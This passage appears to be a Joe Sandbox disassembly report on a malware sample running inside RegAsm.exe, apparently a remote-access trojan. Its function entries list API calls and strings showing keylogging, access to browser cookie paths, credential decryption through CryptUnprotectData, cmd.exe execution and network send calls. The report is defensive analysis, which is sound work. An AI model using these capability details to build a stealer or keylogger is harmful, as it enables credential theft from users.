Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C463: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C478

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

PG, xrefs: 00409EFE
XQG, xrefs: 00409F48
NG, xrefs: 00409F33

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: f05c8dda8b9a34e57be0e8fae93166c36477896d9f7c24b402cc9d84becca7d0
Instruction ID: 54e7b2e3c22fc6d4453642fd245f9e0f365eb47252e0afba34a901821bea4d9f
Opcode Fuzzy Hash: f05c8dda8b9a34e57be0e8fae93166c36477896d9f7c24b402cc9d84becca7d0
Instruction Fuzzy Hash: E65131315082415AC328F732D851AEFB3E5AFD4348F50493FF44AA71E2EF78594AC649

Uniqueness

Uniqueness Score: -1.00%

Function 00443394 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 004433D4
_free.LIBCMT ref: 0044349F
_free.LIBCMT ref: 004434A9

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004433CB, 004433D2, 00443401, 00443439

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
API String ID: 2506810119-472202380
Opcode ID: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
Instruction ID: d495169aa647f9283a7fc5678286d5ac447c1d80eb523621169543331939c4ae
Opcode Fuzzy Hash: 0ecbe3507a193e65cd04cb6d0317a175991b1ee18462a5fe729ee2095615c7ff
Instruction Fuzzy Hash: B1319571900258BFEB22DF9ADC819DFBBACEB85715F10406BF80497211D6788F81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,65921986,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5), ref: 004184CC
Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F), ref: 004184D5

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C3EC

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

0NG, xrefs: 00404097
/sort "Visit Time" /stext ", xrefs: 004040B2

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 5dc7b18c3294578406130f01247f57c84d25c063c36ff6dd3330f41b30409588
Instruction ID: 2723665aff0001c8eb0dcc99e8f292f7fea15a2d2b61d2442ed78a1fc6e7b378
Opcode Fuzzy Hash: 5dc7b18c3294578406130f01247f57c84d25c063c36ff6dd3330f41b30409588
Instruction Fuzzy Hash: 58316371A0011956CB15FBA2DC969EE7375AF90308F40007FF206B71E2EF785D89CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C930 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041CA25

Part of subcall function 004136BD: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004136CC
Part of subcall function 004136BD: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004136F4
Part of subcall function 004136BD: RegCloseKey.KERNEL32(?), ref: 004136FF

Strings

Control Panel\Desktop, xrefs: 0041C96B, 0041C99E, 0041C9EE
WallpaperStyle, xrefs: 0041C970, 0041C9A3, 0041C9F3
TileWallpaper, xrefs: 0041CA0F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction ID: 79be2b8cdbb23de21057fc337ed2e77d7a8ad64980aeb84def733d201678bbd2
Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction Fuzzy Hash: 23119DB2BC025032D918353A1D9BBBE28129757F51F9101ABF6023E3C6E9CF0A9146CF

Uniqueness

Uniqueness Score: -1.00%

Function 00416232 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00416243

Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004137EE
Part of subcall function 004137C5: RegCloseKey.KERNEL32(004660A4), ref: 004137F9

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

PG, xrefs: 00416270
okmode, xrefs: 0041625D
!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
Instruction ID: 70b78272a37c925ffc2bbf27fe81a39eb2a1877854726b2372d6ef4cdaa99610
Opcode Fuzzy Hash: a3f8e80e59589597bb37adf7a2eb6fe0668d100f7b0ae421da322d026006e22d
Instruction Fuzzy Hash: 7B119371B442011ADA187732E872BBD22969F80358F80443FF546AF2E2DEBD4C41574D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C53A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C411: PathFileExistsW.SHLWAPI(00000000), ref: 0040C444

PathFileExistsW.SHLWAPI(00000000), ref: 0040C56B
PathFileExistsW.SHLWAPI(00000000), ref: 0040C5D6

Strings

User Data\Default\Network\Cookies, xrefs: 0040C551
User Data\Profile ?\Network\Cookies, xrefs: 0040C583

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
Instruction ID: 0d3671945d163f179dfc74684fa7d60980301dcab59faebae93cfb08f5644a4c
Opcode Fuzzy Hash: 26efd94af6ac9a76e426a57642c2894b1e6e74959b2217a34813010acf864e26
Instruction Fuzzy Hash: 5C21D37190011ADACB05F7A2DC96CEEB778AE50719B40053FB502B21E2EF78994AC698

Uniqueness

Uniqueness Score: -1.00%

Function 0040C609 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C474: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4A7

PathFileExistsW.SHLWAPI(00000000), ref: 0040C63A
PathFileExistsW.SHLWAPI(00000000), ref: 0040C6A5

Strings

User Data\Default\Network\Cookies, xrefs: 0040C620
User Data\Profile ?\Network\Cookies, xrefs: 0040C652

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
Instruction ID: cd3ac36060f6dd10227e635323ce9c221b0d05fe1f22e326eaff4c9839abebb3
Opcode Fuzzy Hash: 96fc8233489dcc89bd1bce5ebc1090edb6563cce250ead7e360cea783d414e94
Instruction Fuzzy Hash: AC21127190011ADACB14F7A2DC96CEEB778BE50719B40053FB502B31E2EF789946C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0B2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B0C0
wsprintfW.USER32 ref: 0040B141

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,?,0040B77D,?,?,?,?,?,00000000), ref: 0040A5B0

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B0C9
], xrefs: 0040B0CE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 8b25a9eaf082140c2dc15badb16f8c800c94c482f29aa71619a867aea53cfe46
Instruction ID: 1568c5d8c207f630130e9b3f2560adb69d65205e544b8c09f3532fcdf01993a8
Opcode Fuzzy Hash: 8b25a9eaf082140c2dc15badb16f8c800c94c482f29aa71619a867aea53cfe46
Instruction Fuzzy Hash: 7F118172504118AACB19BB96EC568FE77BCEE48315B00012FF506A20D2FF7C9E45C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE3C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AEBC
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AEC8
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AED4

Strings

Online Keylogger Started, xrefs: 0040AE51, 0040AE5A, 0040AE84

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 23e0f306b9d99504cf967e61109fdfbbdb90c741c31e9f95d09247058dcaba5f
Instruction ID: 35c8ad9330cbabd9a84998b0057f5e9cb1d3334ac0cbf96acddd5b3bbbfc58cf
Opcode Fuzzy Hash: 23e0f306b9d99504cf967e61109fdfbbdb90c741c31e9f95d09247058dcaba5f
Instruction Fuzzy Hash: 8101C4A06003183AE62072369C8ADBF7E6DCA81398F4004BFF645226C2D9BD1C5586FB

Uniqueness

Uniqueness Score: -1.00%

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

crypt32, xrefs: 00406A7D
CryptUnprotectData, xrefs: 00406A78

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
Instruction ID: 818ba9a903718bf70962d64877cf58bd49af678424aac798fcc48c71b6ebc0a3
Opcode Fuzzy Hash: 57fd12feec5ca518750c611f0d7dbff0e6bed28cc8204c5ee9b0e51f71af0d5f
Instruction Fuzzy Hash: 3A01D831A40F40AFD7256B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E781

Strings

ios_base::badbit set, xrefs: 0040E73D
ios_base::failbit set, xrefs: 0040E763
ios_base::eofbit set, xrefs: 0040E770

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
Instruction ID: 4562612ed5f23909e08b48de68f8a24239844f145e408ccd9de78b4a74cc907a
Opcode Fuzzy Hash: a9684c954ee5891e16e1afd8ae54deca4c215751209217719e990971aa723dd1
Instruction Fuzzy Hash: 7101D6719443087AD734EA93CC13FBA33585B20708F648C6BBD01762C2EA7D6961C66E

Uniqueness

Uniqueness Score: -1.00%

Function 00413762 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041376D
RegSetValueExW.ADVAPI32 ref: 0041379B
RegCloseKey.ADVAPI32(004752D8), ref: 004137A6

Strings

pth_unenc, xrefs: 00413766

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
Instruction ID: 39ca638f3a556dbd65d2a0e86665551851d0ba55163acdd2be93936ebda2a735
Opcode Fuzzy Hash: 2463f78341ac585a3f535ee31d782d803e40a1c038e044ab0fd1c259522c864a
Instruction Fuzzy Hash: FEF0C271440218FBCF009FA1EC45FEE373CEB00756F10856AF905A61A1EB359E04DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DEFF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DF3E

Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355A2
Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355C6

__CxxThrowException@8.LIBVCRUNTIME ref: 0040DF64

Strings

bad locale name, xrefs: 0040DF4E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
Instruction ID: db90c3436e337910c3e98b764f87bb4696ab9b2babf94f2e459d4bdb298d91bb
Opcode Fuzzy Hash: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
Instruction Fuzzy Hash: 29F044316046046AC734FB66DC53A9A73A49F14714F50897FB40A228D2EF7CAA1ECA99

Uniqueness

Uniqueness Score: -1.00%

Function 00416B7B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D3AB,00000000,00000000,00000000), ref: 00416B95
ShowWindow.USER32(00000009), ref: 00416BAF
SetForegroundWindow.USER32 ref: 00416BBB

Part of subcall function 0041CCE9: AllocConsole.KERNEL32 ref: 0041CCF2
Part of subcall function 0041CCE9: ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
Part of subcall function 0041CCE9: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 3446828153-604454484
Opcode ID: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
Instruction ID: 6c1e835a2e3b1b3c7886c80a3b5eda03b2495c8f90604007deffab7b6682260a
Opcode Fuzzy Hash: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
Instruction Fuzzy Hash: 65F0E2B0148240EED720AB22EC06EFA7758EB50301F00083BFC09C54F2DB389C85C65D

Uniqueness

Uniqueness Score: -1.00%

Function 0041603C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041607E

Strings

/C , xrefs: 0041605C
cmd.exe, xrefs: 00416073
open, xrefs: 00416078

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
Instruction ID: bc4dd6aa4ab558d655425de935e10167e04fb3070ff3751930c06e50bc580138
Opcode Fuzzy Hash: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
Instruction Fuzzy Hash: 0FE0C0B0208305AAC605E775CC95CBF73ADAA94749B50483F7142A21E2EF7C9D49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
UnhookWindowsHookEx.USER32 ref: 0040B815
TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Strings

pth_unenc, xrefs: 0040B7FA

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 7225ec322da407d72c5b2b1858536f2023f8fa499673018caf64050c5ea1622b
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 14E01272205356EFD7241FA09C88C267AEEDA5479A724087EF2C3526A1CA794C10CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

User32.dll, xrefs: 0040140F
GetCursorInfo, xrefs: 0040140A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

User32.dll, xrefs: 004014B4
GetLastInputInfo, xrefs: 004014AF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Uniqueness

Uniqueness Score: -1.00%

Function 00449EC4 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00449F4F
__alldvrm.LIBCMT ref: 0044A150
__alldvrm.LIBCMT ref: 0044A172

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
Instruction ID: 1c99c1baa2c1a51b22a7fec4170ab91f976f64832bd9cd75480204965eff695a
Opcode Fuzzy Hash: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
Instruction Fuzzy Hash: 49A14532A442869FFB21CF18C8817ABBBA5EF15314F18416FE8859B382C23C8D55C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00456B5A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456C89

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
Instruction ID: e3068bce613121f7da0e89462de2b1c1cd52f701d27a7b22a158919516451886
Opcode Fuzzy Hash: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
Instruction Fuzzy Hash: 73416E31A001006BEB226F7A8C4576F36A4EF41336F56021FFC58D7293DA7D88454A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00442741 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: e5160d508a83ee6b7869f395aed11d8c970f4fa8f11d615d3853c79058a8dc25
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: F8411B71A00708BFE724AF79CD41B6ABBE8EB84714F50862FF501DB2C1D7B999418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF5A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040BF6F
Sleep.KERNEL32(00001388), ref: 0040BFF7

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C032
Cleared browsers logins and cookies., xrefs: 0040C043

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 2bb58d4e4793ed88630591eb84e5ac77c1306bd636f01ddb1b3cc4d9bdbabb0c
Instruction ID: cc9ddbdf17d26b75090e7d6a2d5a8c34be93039c878197950bbada9121290459
Opcode Fuzzy Hash: 2bb58d4e4793ed88630591eb84e5ac77c1306bd636f01ddb1b3cc4d9bdbabb0c
Instruction Fuzzy Hash: B431C4143483826ED6116B7558567AB7B828E53754F0844BFB8C46B3C3DA7E48488BEF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A477 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C49F: GetForegroundWindow.USER32 ref: 0041C4AF
Part of subcall function 0041C49F: GetWindowTextLengthW.USER32 ref: 0041C4B8
Part of subcall function 0041C49F: GetWindowTextW.USER32 ref: 0041C4E2

Sleep.KERNEL32(000001F4), ref: 0040A4C1
Sleep.KERNEL32(00000064), ref: 0040A54B

Strings

], xrefs: 0040A4C9
[ , xrefs: 0040A4DD

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

